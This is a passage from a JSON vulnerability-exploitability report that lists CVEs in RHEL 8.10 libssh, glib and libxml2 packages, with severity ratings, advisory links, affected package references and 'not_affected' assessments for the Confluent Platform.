          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0968.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0968"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0968"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0968.txt"
        }
      ],
      "published": "2026-03-26T21:17:01+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0988",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0988"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7461"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0988"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429886"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0988"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7971-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0988"
        }
      ],
      "published": "2026-01-21T12:15:55+00:00",
      "updated": "2026-06-17T10:11:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0989",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0989"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429933"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/998"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0989"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:20:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0990",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0990"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0990"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429959"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1018"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0990"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:18:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
